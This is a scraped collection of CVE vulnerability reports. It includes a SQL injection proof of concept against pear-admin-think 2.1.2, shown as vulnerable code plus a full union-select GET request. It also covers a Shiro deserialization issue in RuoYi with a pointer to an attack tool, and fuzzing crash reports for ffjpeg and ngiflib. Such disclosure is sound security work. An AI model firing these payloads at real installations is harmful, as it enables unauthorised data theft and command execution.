SQL Injection in pear-admin-think version 2.1.2, allows attackers to execute arbitrary code and escalate privileges via crafted GET request to Crud.php.

pear-admin-think V2.1.2 has a sql injection vulnerability

sql injection vulnerability exists in pear-admin-think V2.1.2  
This vulnerability allows remote attackers to obtain user sensitive data and even command execution

url:/admin.php/admin.crud/list/name/admin\_admin?page=1&limit=10  
Vulnerability file:app/admin/controller/admin/Crud.php

        public function list($name)
        {
            $sql = Db::query('SELECT COLUMN_NAME,IS_NULLABLE,DATA_TYPE,IF(COLUMN_COMMENT = "",COLUMN_NAME,COLUMN_COMMENT) COLUMN_COMMENT FROM information_schema.COLUMNS WHERE TABLE_NAME = "' . $name . '"order by ORDINAL_POSITION asc');
            $this->jsonApi('', 0, $sql);
        }
    

Vulnerability exploitation:  
1.Log in backstage  
2.Curd:  
  

poc:

    GET /admin.php/admin.crud/list/name/123"union%20select%201,database(),3,4%23?page=1&limit=10 HTTP/1.1
    Host: www.padmin.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://www.padmin.com/admin.php/admin.crud/index
    Cookie: thinkphp_show_page_trace=0|0; _ga=GA1.2.82281587.1616725844; _gid=GA1.2.1061036003.1616725844; PHPSESSID=24b6f9927555352d4dbfbdf7c145d92a; thinkphp_show_page_trace=0|0; hash=606a3660a4af22638d896476e523344aa470e9b38ea908989711bb9abe5d92b57d31c36a923ed9bd379b16a871efca19b4d6847d9fc88b180e9f620c36a26b8a1f40fc99a846d2ac8eb60b4b4c8cc845
    X-Forwarded-For: 127.0.0.1
    X-Originating-IP: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1

CVE-2021-29378: pear-admin-think V2.1.2 has a sql injection vulnerability · Issue #I3DIEC · Pear Admin/Pear Admin Think - Gitee.com

An issue was discovered in getRememberedSerializedIdentity function in CookieRememberMeManager class in lerry903 RuoYi version 3.4.0, allows remote attackers to escalate privileges.

The cause of the vulnerability  
The project uses shiro1.7.0 version, this version should not have this vulnerability;  
  
  
Code layer troubleshooting:

1.  The default key is used (one of the reasons for this vulnerability)  
    
2.  From the point of view of the exploited gadget, the commonscollection exploit chain is used (the second reason for this vulnerability), and the commons-collections vulnerability should use version 3.2.2 and above  
    
3.  Check shiro related calling code:  
      
    The Shiro deserialization vulnerability is caused by calling the getRememberedSerializedIdentity() function of the CookieRememberMeManager class. The official repair code is as follows, the repair plan is to delete the CookieRememberMeManager class  
      
    The CookieRememberMeManager class was added when the open source project was rewritten, which led to the generation of vulnerabilities.

Exploit：  
You can use the following tools to exploit this vulnerability, Github project: https://github.com/j1anFen/shiro\_attack  
  
Execute system commands

CVE-2021-28411: Wrong code modification leads to Shiro deserialization vulnerability · Issue #20 · lerry903/RuoYi

A potential vulnerability has been identified in OpenText / Micro Focus ArcSight Management Center. The vulnerability could be remotely exploited.


Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-32267: Portal

Cross Site Scripting (XSS) vulnerability in Name Input Field in Contact Us form in Laborator Kalium before 3.0.4, allows remote attackers to execute arbitrary code.

CVE-2020-24075: Kalium Changelog - Laborator

Buffer Overflow vulnerability in jfif_decode() function in rockcarry ffjpeg through version 1.0.0, allows local attackers to execute arbitrary code due to an issue with ALIGN.

There is a segment fault in jfif\_decode (ctxt=0x60a010, pb=0x7fffffffe3c0) at jfif.c:545.

My system is ubuntu 16.04.6 amd64. I compiled the lastest version of ffjpeg and use my fuzzer to fuzz it by using the command ling:  
ffjpeg -d \[file\_name\]

I got a crash sample that could cause a segment fault.

The sample is attached below.  

yang@yang-HP-ZHAN-99-Mobile-Workstation-G1:/MyProject/remote\_test/target\_src/ffjpeg/src$ gdb ./ffjpeg  
GNU gdb (Ubuntu 7.11.1-0ubuntu116.5) 7.11.1  
Copyright (C) 2016 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law. Type "show copying"  
and "show warranty" for details.  
This GDB was configured as "x86\_64-linux-gnu".  
Type "show configuration" for configuration details.  
For bug reporting instructions, please see:  
http://www.gnu.org/software/gdb/bugs/.  
Find the GDB manual and other documentation resources online at:  
http://www.gnu.org/software/gdb/documentation/.  
For help, type "help".  
Type "apropos word" to search for commands related to "word"...  
Reading symbols from ./ffjpeg...done.  
(gdb) r -d /home/yang/crash.jpg  
Starting program: /home/yang/MyProject/remote\_test/target\_src/ffjpeg/src/ffjpeg -d /home/yang/crash.jpg

Program received signal SIGSEGV, Segmentation fault.  
0x0000000000402eb2 in jfif\_decode (ctxt=0x60a010, pb=0x7fffffffe3c0) at jfif.c:545  
545 yuv\_to\_rgb(\*ysrc, \*usrc, \*vsrc, bdst + 2, bdst + 1, bdst + 0);  
(gdb) list  
540 for (j=0; jwidth; j++) {  
541 int ux = j \* jfif->comp\_info\[1\].samp\_factor\_h / sfh\_max;  
542 int vx = j \* jfif->comp\_info\[2\].samp\_factor\_h / sfh\_max;  
543 usrc = yuv\_datbuf\[1\] + uy \* yuv\_stride\[1\] + ux;  
544 vsrc = yuv\_datbuf\[2\] + vy \* yuv\_stride\[2\] + vx;  
545 yuv\_to\_rgb(\*ysrc, \*usrc, \*vsrc, bdst + 2, bdst + 1, bdst + 0);  
546 bdst += 3;  
547 ysrc += 1;  
548 }  
549 bdst -= jfif->width \* 3;  
(gdb)

We used ASAN to identify crash type.  
\==12023==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1c5c6da24c at pc 0x000000405d2d bp 0x7ffe6131cc00 sp 0x7ffe6131cbf0  
READ of size 4 at 0x7f1c5c6da24c thread T0  
#0 0x405d2c in jfif\_decode /home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/jfif.c:545  
#1 0x401233 in main (/home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/ffjpeg+0x401233)  
#2 0x7f1c5b1f383f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#3 0x4010c8 in \_start (/home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/ffjpeg+0x4010c8)

0x7f1c5c6da24c is located 0 bytes to the right of 141900-byte region \[0x7f1c5c6b7800,0x7f1c5c6da24c)  
allocated by thread T0 here:  
#0 0x7f1c5b635602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)  
#1 0x404c96 in jfif\_decode /home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/jfif.c:442  
#2 0x401233 in main (/home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/ffjpeg+0x401233)  
#3 0x7f1c5b1f383f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/aota04/MC\_xxfuzz/test/ffjpeg/build\_asan/src/jfif.c:545 jfif\_decode  
Shadow bytes around the buggy address:  
0x0fe40b8d33f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0fe40b8d3400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0fe40b8d3410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0fe40b8d3420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0fe40b8d3430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
\=>0x0fe40b8d3440: 00 00 00 00 00 00 00 00 00\[04\]fa fa fa fa fa fa  
0x0fe40b8d3450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe40b8d3460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe40b8d3470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe40b8d3480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0fe40b8d3490: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05

CVE-2020-24222: ffjpeg "jfif_decode" function segment fault · Issue #31 · rockcarry/ffjpeg

An issue was discovered in GetByte function in miniupnp ngiflib version 0.4, allows local attackers to cause a denial of service (DoS) via crafted .gif file (infinite loop).

I used the command line gif2tga --outbase /dev/null path\_to\_file to run gif2tga and got a timeout.  
The program didn't return or repsond.  
The system is ubuntu 16.04.6 amd-64, source commit id is: 0245fd4  
compiled by gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)

debug informations is:  
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1  
Copyright (C) 2016 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law. Type "show copying"  
and "show warranty" for details.  
This GDB was configured as "x86\_64-linux-gnu".  
Type "show configuration" for configuration details.  
For bug reporting instructions, please see:  
http://www.gnu.org/software/gdb/bugs/.  
Find the GDB manual and other documentation resources online at:  
http://www.gnu.org/software/gdb/documentation/.  
For help, type "help".  
Type "apropos word" to search for commands related to "word"...  
Reading symbols from gif2tga...done.  
(gdb) r --outbase /dev/null /home/yang/test.gif  
Starting program: /home/yang/MyProject/remote\_test/target\_src/ngiflib/gif2tga --outbase /dev/null /home/yang/test.gif  
^C  
Program received signal SIGINT, Interrupt.  
0x00007ffff7b04320 in \_\_read\_nocancel () at ../sysdeps/unix/syscall-template.S:84  
84 ../sysdeps/unix/syscall-template.S: No such file or directory.  
(gdb) step  
\_IO\_new\_file\_underflow (fp=0x605070) at fileops.c:594  
594 fileops.c: No such file or directory.  
(gdb) step  
597 in fileops.c  
(gdb)  
596 in fileops.c  
(gdb)  
597 in fileops.c  
(gdb)  
607 in fileops.c  
(gdb)  
613 in fileops.c  
(gdb)  
608 in fileops.c  
(gdb)  
613 in fileops.c  
(gdb)  
\_\_GI\_\_IO\_default\_uflow (fp=0x605070) at genops.c:414  
414 genops.c: No such file or directory.  
(gdb)  
417 in genops.c  
(gdb)  
\_IO\_getc (fp=0x605070) at getc.c:37  
37 getc.c: No such file or directory.  
(gdb)  
\_IO\_acquire\_lock\_fct (p=) at libioP.h:866  
866 libioP.h: No such file or directory.  
(gdb)  
\_IO\_getc (fp=0x605070) at getc.c:37  
37 getc.c: No such file or directory.  
(gdb)  
\_IO\_acquire\_lock\_fct (p=) at libioP.h:867  
867 libioP.h: No such file or directory.  
(gdb)

The poc is attached below.

  
Thank you.

CVE-2020-24221: I found a large or infinite loop in ngiflib · Issue #17 · miniupnp/ngiflib

An issue was discovered in ecma-helpers.c in jerryscript version 2.3.0, allows local attackers to cause a denial of service (DoS) (Null Pointer Dereference).

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2020-24187: Poc/jerryscript/NULL-dereference-ecma_get_lex_env_type at master · Aurorainfinity/Poc

Cross Site Scripting (XSS) vulnerability in backend/pages/modify.php in Lepton-CMS version 4.7.0, allows remote attackers to execute arbitrary code.

NEW Security Release LEPTON 4.7.0.

This is again a Security Bugfix. Two days after release of LEPTON 4.6.0 **Trung Thanh Le From baomatcoban.info** informed us, that the fixes in 4.6.0 are not strong enough.

That's why we have to release LEPTON 4.7.0 as a Hotfix.

Furtermore please note, that the Droplet "ShowSection is not working from 4.6.0, please use the current Droplet Sectionpicker from LEPAdoR

We are sorry for this inconvinience and ask you strongly to update to LEPTON 4.7.0.

Version 4.7.0 stable is available on Downloadpage and also a mobile Version can be downloaded.

Upgrade to LEPTON 4.7.0 is possible .

Back

CVE-2020-24872: news around LEPTON

Cross Site Scripting (XSS) vulnerability in Rendering Engine in jbt Markdown Editor thru commit 2252418c27dffbb35147acd8ed324822b8919477, allows remote attackers to execute arbirary code via crafted payload or opening malicious .md file.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-19952: XSS vulnerability on <abbr> and <sup><EMBED> label · Issue #106 · jbt/markdown-editor

Cross Site Request Forgery (CSRF) vulnerability in yzmcms version 5.6, allows remote attackers to escalate privileges and gain sensitive information sitemodel/add.html endpoint.

Source

CVE